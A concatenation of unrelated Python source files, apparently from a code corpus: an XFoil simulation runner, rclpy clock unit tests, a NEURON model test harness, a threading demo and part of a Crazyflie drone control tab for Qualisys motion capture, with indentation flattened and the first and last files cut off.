queue.put(line)
out.close()
def read_testbench_manifest_parameters(testbench_manifest):
parameters_dict = dict()
print "Reading parameters from testbench_manifest.json..."
print
for parameter in testbench_manifest['Parameters']:
parameters_dict[parameter['Name']] = parameter['Value']
print parameter['Name'] + ": " + str(parameter['Value'])
print
return parameters_dict
if __name__ == '__main__':
print "Running " + str(__file__) + "..."
#Obtain alpha
with open('testbench_manifest.json', 'r') as f_in:
testbench_manifest = json.load(f_in)
alpha = float(read_testbench_manifest_parameters(testbench_manifest)["Alpha"])
#Run the XFoil simulation ------------------------------------------------------------------------------------------
print "Opening 'script.xfoil'..."
with open('script.xfoil', 'r') as f_in:
xfoil_script = f_in.readlines()
files = ["plot.ps", "polar.txt"]
for f in files:
if os.path.exists(f):
os.remove(f)
print "Running XFOIL simulation..."
converged = False
if platform.system() == 'Windows':
p = Popen(['C:/OpenMETA/xfoil-and-nrel-codes/bin/xfoil.exe'], stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=ON_POSIX)
elif platform.system() == 'Darwin':
p = Popen(['/Applications/Xfoil.app/Contents/Resources/xfoil'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
'''
q = Queue()
t = Thread(target=enqueue_output, args=(p.stdout, q))
t.daemon = True # thread dies with the program
t.start()
#Setup
for i in range(len(xfoil_script)):
print ">>> {}".format(xfoil_script[i][:-1])
p.stdin.write(xfoil_script[i])
# read line without blocking
try:
line = q.get_nowait() # or q.get(timeout=.1)
except Empty:
print('no output yet')
else: # got line
print line
'''
#Setup
for i in range(9):
print ">>> {}".format(xfoil_script[i][:-1])
p.stdin.write(xfoil_script[i])
start_alpha = 5.0
if start_alpha > alpha:
offset = -0.5
else:
offset = 0.5
while start_alpha != alpha:
print ">>> {}".format("alfa {}".format(start_alpha))
print ">>> !"
print ">>> !"
p.stdin.write("alfa {}\n".format(start_alpha))
p.stdin.write("!\n")
p.stdin.write("!\n")
start_alpha += offset
print ">>> {}".format("alfa {}".format(start_alpha))
print ">>> !"
print ">>> !"
p.stdin.write("alfa {}\n".format(start_alpha))
p.stdin.write("!\n")
p.stdin.write("!\n")
for i in range(12, 17):
print ">>> {}".format(xfoil_script[i][:-1])
p.stdin.write(xfoil_script[i])
p.stdin.close() # Needed or else the script hangs.
p.stdout.close() # See: https://stackoverflow.com/questions/21141712/subprocess-popen-communicate-vs-stdin-write-and-stdout-read
p.stderr.close() # and: https://stackoverflow.com/questions/27451182/proper-way-to-close-all-files-after-subprocess-popen-and-communicate?rq=1
converged = True
# result = p.communicate(input=xfoil_script)
result = ["",""]
#Save log files
print "Saving log files..."
with open(os.path.join('log', 'xfoil-stdout.log'), 'w') as f_out:
f_out.write(result[0])
with open(os.path.join('log', 'xfoil-stderr.log'), 'w') as f_out:
if result[1]:
f_out.write(result[1])
else:
# empty file
pass
# if converged:
# with open('polar.txt', 'r') as f_in:
# polar_lines = f_in.readlines()
# for line in polar_lines:
# print line[:-1]
# print len(polar_lines)
# final_line=polar_lines[-1].split()
# # Alpha = final_line[0]
# CL = final_line[1]
# CD = final_line[2]
# CM = final_line[4]
# print CL
# print CD
# print CM
#Add artifacts to "artifacts" in testbench_manifest.json
print "Recording artifacts..."
with open('testbench_manifest.json', 'r') as f_in:
testbench_manifest = json.load(f_in)
expected_files = {"plot": "plot.ps",
"polar table": "polar.txt",
"XFOIL stdout log": posixpath.join("log", "xfoil-stdout.log"),
"XFOIL stderr log": posixpath.join("log", "xfoil-stderr.log")}
artifacts = testbench_manifest["Artifacts"]
for k, v in expected_files.iteritems():
if os.path.exists(v):
artifacts.append({"Tag": k, "Location": v})
with open('testbench_manifest.json', 'w') as f_out:
json.dump(testbench_manifest, f_out, indent=2)
print "Done."
#Let the testbench executor know how the job went
sys.exit(p.returncode)
|
test_clock.py
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import unittest
from unittest.mock import Mock
import pytest
import rclpy
from rclpy.clock import Clock
from rclpy.clock import ClockType
from rclpy.clock import JumpHandle
from rclpy.clock import JumpThreshold
from rclpy.clock import ROSClock
from rclpy.context import Context
from rclpy.duration import Duration
from rclpy.exceptions import NotInitializedException
from rclpy.time import Time
from rclpy.utilities import get_default_context
from .mock_compat import __name__ as _ # noqa: ignore=F401
A_SMALL_AMOUNT_OF_TIME = Duration(seconds=0.5)
def test_invalid_jump_threshold():
with pytest.raises(ValueError, match='.*min_forward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=0),
min_backward=Duration(nanoseconds=-1))
with pytest.raises(ValueError, match='.*min_forward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=-1),
min_backward=Duration(nanoseconds=-1))
with pytest.raises(ValueError, match='.*min_backward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=1),
min_backward=Duration(nanoseconds=0))
with pytest.raises(ValueError, match='.*min_backward.*'):
JumpThreshold(
min_forward=Duration(nanoseconds=1),
min_backward=Duration(nanoseconds=1))
with pytest.raises(ValueError, match='.*must be enabled.*'):
JumpThreshold(
min_forward=None,
min_backward=None,
on_clock_change=False)
class TestClock(unittest.TestCase):
def test_clock_construction(self):
clock = Clock()
with self.assertRaises(TypeError):
clock = Clock(clock_type='STEADY_TIME')
clock = Clock(clock_type=ClockType.STEADY_TIME)
assert clock.clock_type == ClockType.STEADY_TIME
clock = Clock(clock_type=ClockType.SYSTEM_TIME)
assert clock.clock_type == ClockType.SYSTEM_TIME
# A subclass ROSClock is returned if ROS_TIME is specified.
clock = Clock(clock_type=ClockType.ROS_TIME)
assert clock.clock_type == ClockType.ROS_TIME
assert isinstance(clock, ROSClock)
# Direct instantiation of a ROSClock is also possible.
clock = ROSClock()
assert clock.clock_type == ClockType.ROS_TIME
def test_clock_now(self):
# System time should be roughly equal to time.time()
# There will still be differences between them, with the bound depending on the scheduler.
clock = Clock(clock_type=ClockType.SYSTEM_TIME)
now = clock.now()
python_time_sec = time.time()
assert isinstance(now, Time)
assert abs(now.nanoseconds * 1e-9 - python_time_sec) < 5
# Unless there is a date change during the test, system time have increased between these
# calls.
now2 = clock.now()
assert now2 > now
# Steady time should always return increasing values
clock = Clock(clock_type=ClockType.STEADY_TIME)
now = clock.now()
now2 = now
for i in range(10):
now2 = clock.now()
assert now2 > now
now = now2
def test_ros_time_is_active(self):
clock = ROSClock()
clock._set_ros_time_is_active(True)
assert clock.ros_time_is_active
clock._set_ros_time_is_active(False)
assert not clock.ros_time_is_active
def test_triggered_time_jump_callbacks(self):
one_second = Duration(seconds=1)
half_second = Duration(seconds=0.5)
negative_half_second = Duration(seconds=-0.5)
negative_one_second = Duration(seconds=-1)
threshold1 = JumpThreshold(
min_forward=one_second, min_backward=negative_half_second, on_clock_change=False)
threshold2 = JumpThreshold(
min_forward=half_second, min_backward=negative_one_second, on_clock_change=False)
pre_callback1 = Mock()
post_callback1 = Mock()
pre_callback2 = Mock()
post_callback2 = Mock()
clock = ROSClock()
handler1 = clock.create_jump_callback(
threshold1, pre_callback=pre_callback1, post_callback=post_callback1)
handler2 = clock.create_jump_callback(
threshold2, pre_callback=pre_callback2, post_callback=post_callback2)
clock.set_ros_time_override(Time(seconds=1))
clock._set_ros_time_is_active(True)
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_not_called()
post_callback2.assert_not_called()
# forward jump
clock.set_ros_time_override(Time(seconds=1.75))
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_called()
post_callback2.assert_called()
pre_callback1.reset_mock()
post_callback1.reset_mock()
pre_callback2.reset_mock()
post_callback2.reset_mock()
# backwards jump
clock.set_ros_time_override(Time(seconds=1))
pre_callback1.assert_called()
post_callback1.assert_called()
pre_callback2.assert_not_called()
post_callback2.assert_not_called()
handler1.unregister()
handler2.unregister()
def test_triggered_clock_change_callbacks(self):
one_second = Duration(seconds=1)
negative_one_second = Duration(seconds=-1)
threshold1 = JumpThreshold(
min_forward=one_second, min_backward=negative_one_second, on_clock_change=False)
threshold2 = JumpThreshold(min_forward=None, min_backward=None, on_clock_change=True)
threshold3 = JumpThreshold(
min_forward=one_second, min_backward=negative_one_second, on_clock_change=True)
pre_callback1 = Mock()
post_callback1 = Mock()
pre_callback2 = Mock()
post_callback2 = Mock()
pre_callback3 = Mock()
post_callback3 = Mock()
clock = ROSClock()
handler1 = clock.create_jump_callback(
threshold1, pre_callback=pre_callback1, post_callback=post_callback1)
handler2 = clock.create_jump_callback(
threshold2, pre_callback=pre_callback2, post_callback=post_callback2)
handler3 = clock.create_jump_callback(
threshold3, pre_callback=pre_callback3, post_callback=post_callback3)
clock._set_ros_time_is_active(True)
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_called()
post_callback2.assert_called()
pre_callback3.assert_called()
post_callback3.assert_called()
pre_callback1.reset_mock()
post_callback1.reset_mock()
pre_callback2.reset_mock()
post_callback2.reset_mock()
pre_callback3.reset_mock()
post_callback3.reset_mock()
clock._set_ros_time_is_active(True)
pre_callback1.assert_not_called()
post_callback1.assert_not_called()
pre_callback2.assert_not_called()
post_callback2.assert_not_called()
pre_callback3.assert_not_called()
post_callback3.assert_not_called()
handler1.unregister()
handler2.unregister()
handler3.unregister()
@pytest.fixture()
def default_context():
rclpy.init()
yield get_default_context()
rclpy.shutdown()
@pytest.fixture()
def non_default_context():
context = Context()
context.init()
yield context
context.try_shutdown()
def test_sleep_until_mismatched_clock_type(default_context):
clock = Clock(clock_type=ClockType.SYSTEM_TIME)
with pytest.raises(ValueError, match='.*clock type does not match.*'):
clock.sleep_until(Time(clock_type=ClockType.STEADY_TIME))
def test_sleep_until_non_default_context(non_default_context):
clock = Clock()
assert clock.sleep_until(clock.now() + Duration(seconds=0.1), context=non_default_context)
def test_sleep_for_non_default_context(non_default_context):
clock = Clock()
assert clock.sleep_for(Duration(seconds=0.1), context=non_default_context)
def test_sleep_until_invalid_context():
clock = Clock()
with pytest.raises(NotInitializedException):
clock.sleep_until(clock.now() + Duration(seconds=0.1), context=Context())
def test_sleep_for_invalid_context():
clock = Clock()
with pytest.raises(NotInitializedException):
clock.sleep_for(Duration(seconds=0.1), context=Context())
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_until_basic(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=0.1)
start = clock.now()
assert clock.sleep_until(clock.now() + sleep_duration)
stop = clock.now()
assert stop - start >= sleep_duration
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_for_basic(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=0.1)
start = clock.now()
assert clock.sleep_for(sleep_duration)
stop = clock.now()
assert stop - start >= sleep_duration
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_until_time_in_past(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=-1)
start = clock.now()
assert clock.sleep_until(clock.now() + sleep_duration)
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
@pytest.mark.parametrize(
'clock_type', (ClockType.SYSTEM_TIME, ClockType.STEADY_TIME, ClockType.ROS_TIME))
def test_sleep_for_negative_duration(default_context, clock_type):
clock = Clock(clock_type=clock_type)
sleep_duration = Duration(seconds=-1)
start = clock.now()
assert clock.sleep_for(sleep_duration)
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
@pytest.mark.parametrize('ros_time_enabled', (True, False))
def test_sleep_until_ros_time_toggled(default_context, ros_time_enabled):
clock = ROSClock()
clock._set_ros_time_is_active(not ros_time_enabled)
retval = None
def run():
nonlocal retval
retval = clock.sleep_until(clock.now() + Duration(seconds=10))
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_until call
time.sleep(0.2)
clock._set_ros_time_is_active(ros_time_enabled)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
@pytest.mark.parametrize('ros_time_enabled', (True, False))
def test_sleep_for_ros_time_toggled(default_context, ros_time_enabled):
clock = ROSClock()
clock._set_ros_time_is_active(not ros_time_enabled)
retval = None
def run():
nonlocal retval
retval = clock.sleep_for(Duration(seconds=10))
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_for call
time.sleep(0.2)
clock._set_ros_time_is_active(ros_time_enabled)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
def test_sleep_until_context_shut_down(non_default_context):
clock = Clock()
retval = None
def run():
nonlocal retval
retval = clock.sleep_until(
clock.now() + Duration(seconds=10), context=non_default_context)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_until call
time.sleep(0.2)
non_default_context.shutdown()
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
def test_sleep_for_context_shut_down(non_default_context):
clock = Clock()
retval = None
def run():
nonlocal retval
retval = clock.sleep_for(Duration(seconds=10), context=non_default_context)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_for call
time.sleep(0.2)
non_default_context.shutdown()
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval is False
def test_sleep_until_ros_time_enabled(default_context):
clock = ROSClock()
clock._set_ros_time_is_active(True)
start_time = Time(seconds=1, clock_type=ClockType.ROS_TIME)
stop_time = start_time + Duration(seconds=10)
clock.set_ros_time_override(start_time)
retval = None
def run():
nonlocal retval
retval = clock.sleep_until(stop_time)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_until call
time.sleep(0.2)
clock.set_ros_time_override(stop_time)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval
def test_sleep_for_ros_time_enabled(default_context):
clock = ROSClock()
clock._set_ros_time_is_active(True)
start_time = Time(seconds=1, clock_type=ClockType.ROS_TIME)
sleep_duration = Duration(seconds=10)
stop_time = start_time + sleep_duration
clock.set_ros_time_override(start_time)
retval = None
def run():
nonlocal retval
retval = clock.sleep_for(sleep_duration)
t = threading.Thread(target=run)
t.start()
# wait for thread to get inside sleep_for call
time.sleep(0.2)
clock.set_ros_time_override(stop_time)
# wait for thread to exit
start = clock.now()
t.join()
stop = clock.now()
assert stop - start < A_SMALL_AMOUNT_OF_TIME
assert retval
def test_with_jump_handle():
clock = ROSClock()
clock._set_ros_time_is_active(False)
post_callback = Mock()
threshold = JumpThreshold(min_forward=None, min_backward=None, on_clock_change=True)
with clock.create_jump_callback(threshold, post_callback=post_callback) as jump_handler:
assert isinstance(jump_handler, JumpHandle)
clock._set_ros_time_is_active(True)
post_callback.assert_called_once()
post_callback.reset_mock()
clock._set_ros_time_is_active(False)
post_callback.assert_not_called()
|
ModelTest.py
|
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from subprocess import Popen, PIPE
from threading import Thread
import json
import psutil
class ModelTest(object):
@abstractmethod
def prepare(self, h, soma, mechanism):
pass
@abstractmethod
def on_run_complete(self):
pass
@abstractmethod
def getResults(self):
raise NotImplementedError()
def __init__(self):
self.error = False
self.saveStartDir()
def saveStartDir(self):
self.startPath = os.getcwd()
def restoreStartDir(self):
os.chdir(self.startPath)
def modelDir(self):
return os.path.dirname(self.path)
def modelFileName(self):
return os.path.basename(self.path)
def resultsDir(self):
return os.path.dirname(self.resultsFile)
def comparisonPath(self):
return self.resultsDir() + "/comparison.png"
def loadResults(self):
with open(self.resultsFile) as r:
result = json.load(r)
return result
def getResultsOwnThread(self):
self.printAndRun('python -c "from ' + self.__class__.__module__ + ' import ' + self.__class__.__name__ + ' as test; test().getResults();"')
def printAndRun(self, command):
sys.stdout.write('Running: "' + command + '" ... ')
startDir = os.getcwd()
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, err, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
for line in iter(err.readline, b''):
queue.put(line)
err.close()
q = Queue()
p = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, bufsize=1, close_fds=ON_POSIX)
t = Thread(target=enqueue_output, args=(p.stdout, p.stderr, q))
t.daemon = True # thread dies with the program
lines = ""
# read line without blocking
# check if process is alive and if so, wait up to 5 mins for output
# handle non-outputting short processes eg. rm ...
# and long running, non-outputting processes like neuron run
# and long running, hung processes that show an error
# Start the process
pid = p.pid
t.start()
keepChecking = True
# Check for errors in output
while keepChecking:
# Get all lines thus far from process
try:
line = ""
while True:
line = line + q.get_nowait()
# No more lines
except Empty:
pass
# If no lines received, wait
if line == "":
time.sleep(0.01)
# Process the output line
else:
lines = lines + line
errorsFound = self.errorsFound(line)
if errorsFound:
logFile = startDir + "/error.log"
with(open(logFile, "w")) as f:
f.write(command)
f.write(lines)
self.kill_proc_tree(pid)
print('ERROR')
print(lines)
assert not errorsFound # See error.log file in script start folder
# If the thread is dead and there are no more output lines, stop checking
if not t.isAlive() and q.empty():
keepChecking = False
print('OK')
def errorsFound(self, line):
# Clear false alarms
cleanOutput = line \
.replace("NRN Error", "") \
.replace("NMODL Error", "") \
.lower()
errorsFound = 'error' in cleanOutput or \
'segmentation fault' in cleanOutput or \
'is not valid against the schema' in cleanOutput or \
'problem in model' in cleanOutput or \
'traceback' in cleanOutput or \
'out of range, returning exp' in cleanOutput
return errorsFound
def kill_proc_tree(self, pid, sig=signal.SIGTERM, include_parent=True,
timeout=None, on_terminate=None):
"""Kill a process tree (including grandchildren) with signal
"sig" and return a (gone, still_alive) tuple.
"on_terminate", if specified, is a callabck function which is
called as soon as a child terminates.
"""
if pid == os.getpid():
raise RuntimeError("I refuse to kill myself")
parent = psutil.Process(pid)
children = parent.children(recursive=True)
if include_parent:
children.append(parent)
for p in children:
p.send_signal(sig)
gone, alive = psutil.wait_procs(children, timeout=timeout,
callback=on_terminate)
return (gone, alive)
|
timeitTest.py
|
# timeitTest.py
import threading
import random
import time
def myWorker():
for i in range(5):
print("Starting wait time")
time.sleep(random.randint(1, 5))
print("Completed Wait")
thread1 = threading.Thread(target=myWorker)
thread2 = threading.Thread(target=myWorker)
thread3 = threading.Thread(target=myWorker)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
|
QualisysTab.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) 2011-2013 Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""
Tab for controlling the Crazyflie using Qualisys Motion Capturing system
"""
import logging
import time
import datetime
import math
from enum import Enum
from PyQt5 import uic
from PyQt5.QtCore import pyqtSignal, pyqtSlot, QObject, pyqtProperty
from PyQt5.QtCore import QStateMachine, QState, QEvent, QTimer
from PyQt5.QtCore import QAbstractTransition
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtGui import QStandardItemModel, QStandardItem
import cfclient
from cfclient.ui.tab import Tab
from cfclient.utils.config import Config
from cflib.crazyflie.log import LogConfig
from cflib.crazyflie.syncLogger import SyncLogger
import xml.etree.cElementTree as ET
import threading
import qtm
import asyncio
__author__ = 'Bitcraze AB'
__all__ = ['QualisysTab']
logger = logging.getLogger(__name__)
qualisys_tab_class, _ = uic.loadUiType(cfclient.module_path +
"/ui/tabs/qualisysTab.ui")
class FlightModeEvent(QEvent):
def __init__(self, mode, parent=None):
super(FlightModeEvent, self).__init__(QEvent.Type(QEvent.User + 1))
self.mode = mode
class FlightModeTransition(QAbstractTransition):
def __init__(self, value, parent=None):
super(FlightModeTransition, self).__init__(parent)
self.value = value
def eventTest(self, event):
if event.type() != QEvent.Type(QEvent.User + 1):
return False
return event.mode == self.value
def onTransition(self, event):
pass
class FlightModeStates(Enum):
LAND = 0
LIFT = 1
FOLLOW = 2
PATH = 3
HOVERING = 4
GROUNDED = 5
DISCONNECTED = 6
CIRCLE = 7
RECORD = 8
COLOR_BLUE = '#3399ff'
COLOR_GREEN = '#00ff60'
COLOR_RED = '#cc0404'
def progressbar_stylesheet(color):
return """
QProgressBar {
border: 1px solid #AAA;
background-color: transparent;
}
QProgressBar::chunk {
background-color: """ + color + """;
}
"""
def start_async_task(task):
return asyncio.ensure_future(task)
class QDiscovery(QObject):
discoveringChanged = pyqtSignal(bool)
discoveredQTM = pyqtSignal(str, str)
def __init__(self, *args):
super().__init__(*args)
self._discovering = False
self._found_qtms = {}
@pyqtProperty(bool, notify=discoveringChanged)
def discovering(self):
return self._discovering
@discovering.setter
def discovering(self, value):
if value != self._discovering:
self._discovering = value
self.discoveringChanged.emit(value)
def discover(self, *, interface='0.0.0.0'):
self.discovering = True
start_async_task(self._discover_qtm(interface))
async def _discover_qtm(self, interface):
try:
async for qtm_instance in qtm.Discover(interface):
info = qtm_instance.info.decode("utf-8").split(",")[0]
self.discoveredQTM.emit(info, qtm_instance.host)
except Exception as e:
logger.info("Exception during qtm discovery: %s", e)
self.discovering = False
class QualisysTab(Tab, qualisys_tab_class):
"""
Tab for controlling the crazyflie using
Qualisys Motion Capturing system
"""
_connected_signal = pyqtSignal(str)
_disconnected_signal = pyqtSignal(str)
_log_data_signal = pyqtSignal(int, object, object)
_log_error_signal = pyqtSignal(object, str)
_param_updated_signal = pyqtSignal(str, str)
_imu_data_signal = pyqtSignal(int, object, object)
_flight_path_select_row = pyqtSignal(int)
_flight_path_set_model = pyqtSignal(object)
_path_selector_add_item = pyqtSignal(str)
_path_selector_set_index = pyqtSignal(int)
statusChanged = pyqtSignal(str)
cfStatusChanged = pyqtSignal(str)
qtmStatusChanged = pyqtSignal(str)
def __init__(self, tabWidget, helper, *args):
super(QualisysTab, self).__init__(*args)
self.setupUi(self)
self._machine = QStateMachine()
self._setup_states()
self._event = threading.Event()
self.tabName = "Qualisys"
self.menuName = "Qualisys Tab"
self.tabWidget = tabWidget
self.qtm_6DoF_labels = None
self._helper = helper
self._qtm_connection = None
self._cf = None
self.model = QStandardItemModel(10, 4)
self._cf_status = self.cfStatusLabel.text()
self._status = self.statusLabel.text()
self._qtm_status = self.qtmStatusLabel.text()
self.flying_enabled = False
self.switch_flight_mode(FlightModeStates.DISCONNECTED)
self.path_pos_threshold = 0.2
self.circle_pos_threshold = 0.1
self.circle_radius = 1.5
self.circle_resolution = 15.0
self.position_hold_timelimit = 0.1
self.length_from_wand = 2.0
self.circle_height = 1.2
self.new_path = []
self.recording = False
self.land_for_recording = False
self.default_flight_paths = [
[
"Path 1: Sandbox",
[0.0, -1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0]],
[
"Path 2: Height Test",
[0.0, 0.0, 0.5, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 1.5, 0.0],
[0.0, 0.0, 2.0, 0.0],
[0.0, 0.0, 2.3, 0.0],
[0.0, 0.0, 1.8, 0.0],
[0.0, 0.0, 0.5, 0.0],
[0.0, 0.0, 0.3, 0.0],
[0.0, 0.0, 0.15, 0.0]],
[
"Path 3: 'Spiral'",
[0.0, 0.0, 1.0, 0.0],
[0.5, 0.5, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0],
[-0.5, 0.5, 1.0, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.5, 0.5, 1.2, 0.0],
[0.0, 1.0, 1.4, 0.0],
[-0.5, 0.5, 1.6, 0.0],
[0.0, 0.0, 1.8, 0.0],
[0.5, 0.5, 1.5, 0.0],
[0.0, 1.0, 1.0, 0.0],
[-0.5, 0.5, 0.5, 0.0],
[0.0, 0.0, 0.25, 0.0]]]
# The position and rotation of the cf and wand obtained by the
# camera tracking, if it cant be tracked the position becomes Nan
self.cf_pos = Position(0, 0, 0)
self.wand_pos = Position(0, 0, 0)
# The regular cf_pos can a times due to lost tracing become Nan,
# this the latest known valid cf position
self.valid_cf_pos = Position(0, 0, 0)
try:
self.flight_paths = Config().get("flight_paths")
except Exception as err:
logger.debug("No flight config")
self.flight_paths = self.default_flight_paths
if self.flight_paths == []:
self.flight_paths = self.default_flight_paths
# Always wrap callbacks from Crazyflie API though QT Signal/Slots
# to avoid manipulating the UI when rendering it
self._connected_signal.connect(self._connected)
self._disconnected_signal.connect(self._disconnected)
self._log_data_signal.connect(self._log_data_received)
self._param_updated_signal.connect(self._param_updated)
self._flight_path_select_row.connect(self._select_flight_path_row)
self._flight_path_set_model.connect(self._set_flight_path_model)
self._path_selector_add_item.connect(self._add_path_selector_item)
self._path_selector_set_index.connect(self._set_path_selector_index)
self.statusChanged.connect(self._update_status)
self.cfStatusChanged.connect(self._update_cf_status)
self.qtmStatusChanged.connect(self._update_qtm_status)
# Connect the Crazyflie API callbacks to the signals
self._helper.cf.connected.add_callback(self._connected_signal.emit)
self._helper.cf.disconnected.add_callback(
self._disconnected_signal.emit)
# Connect the UI elements
self.connectQtmButton.clicked.connect(self.establish_qtm_connection)
self.landButton.clicked.connect(self.set_land_mode)
self.liftButton.clicked.connect(self.set_lift_mode)
self.followButton.clicked.connect(self.set_follow_mode)
self.emergencyButton.clicked.connect(self.set_kill_engine)
self.pathButton.clicked.connect(self.set_path_mode)
self.circleButton.clicked.connect(self.set_circle_mode)
self.recordButton.clicked.connect(self.set_record_mode)
self.removePathButton.clicked.connect(self.remove_current_path)
for i in range(len(self.flight_paths)):
self.pathSelector.addItem(self.flight_paths[i][0])
self.pathSelector.currentIndexChanged.connect(self.path_changed)
self.quadBox.currentIndexChanged[str].connect(self.quad_changed)
self.stickBox.currentIndexChanged[str].connect(self.stick_changed)
self.stickName = 'qstick'
self.quadName = 'crazyflie'
# Populate UI elements
self.posHoldPathBox.setText(str(self.position_hold_timelimit))
self.radiusBox.setText(str(self.circle_radius))
self.posHoldCircleBox.setText(str(self.position_hold_timelimit))
self.resolutionBox.setText(str(self.circle_resolution))
self.path_changed()
self._discovery = QDiscovery()
self._discovery.discoveringChanged.connect(self._is_discovering)
self._discovery.discoveredQTM.connect(self._qtm_discovered)
self.discoverQTM.clicked.connect(self._discovery.discover)
self._discovery.discover()
self._ui_update_timer = QTimer(self)
self._ui_update_timer.timeout.connect(self._update_ui)
def _setup_states(self):
parent_state = QState()
# DISCONNECTED
disconnected = QState(parent_state)
disconnected.assignProperty(self, "status", "Disabled")
disconnected.assignProperty(self.pathButton, "text", "Path Mode")
disconnected.assignProperty(self.followButton, "text", "Follow Mode")
disconnected.assignProperty(self.circleButton, "text", "Circle Mode")
disconnected.assignProperty(self.recordButton, "text", "Record Mode")
disconnected.assignProperty(self.pathButton, "enabled", False)
disconnected.assignProperty(self.emergencyButton, "enabled", False)
disconnected.assignProperty(self.landButton, "enabled", False)
disconnected.assignProperty(self.followButton, "enabled", False)
disconnected.assignProperty(self.liftButton, "enabled", False)
disconnected.assignProperty(self.circleButton, "enabled", False)
disconnected.assignProperty(self.recordButton, "enabled", False)
disconnected.entered.connect(self._flight_mode_disconnected_entered)
# HOVERING
hovering = QState(parent_state)
hovering.assignProperty(self, "status", "Hovering...")
hovering.assignProperty(self.pathButton, "text", "Path Mode")
hovering.assignProperty(self.followButton, "text", "Follow Mode")
hovering.assignProperty(self.circleButton, "text", "Circle Mode")
hovering.assignProperty(self.recordButton, "text", "Record Mode")
hovering.assignProperty(self.pathButton, "enabled", True)
hovering.assignProperty(self.emergencyButton, "enabled", True)
hovering.assignProperty(self.landButton, "enabled", True)
hovering.assignProperty(self.followButton, "enabled", True)
hovering.assignProperty(self.liftButton, "enabled", False)
hovering.assignProperty(self.circleButton, "enabled", True)
hovering.assignProperty(self.recordButton, "enabled", True)
hovering.entered.connect(self._flight_mode_hovering_entered)
# GROUNDED
grounded = QState(parent_state)
grounded.assignProperty(self, "status", "Landed")
grounded.assignProperty(self.pathButton, "text", "Path Mode")
grounded.assignProperty(self.followButton, "text", "Follow Mode")
grounded.assignProperty(self.circleButton, "text", "Circle Mode")
grounded.assignProperty(self.recordButton, "text", "Record Mode")
grounded.assignProperty(self.pathButton, "enabled", True)
grounded.assignProperty(self.emergencyButton, "enabled", True)
grounded.assignProperty(self.landButton, "enabled", False)
grounded.assignProperty(self.followButton, "enabled", False)
grounded.assignProperty(self.liftButton, "enabled", True)
grounded.assignProperty(self.circleButton, "enabled", True)
grounded.assignProperty(self.recordButton, "enabled", True)
grounded.entered.connect(self._flight_mode_grounded_entered)
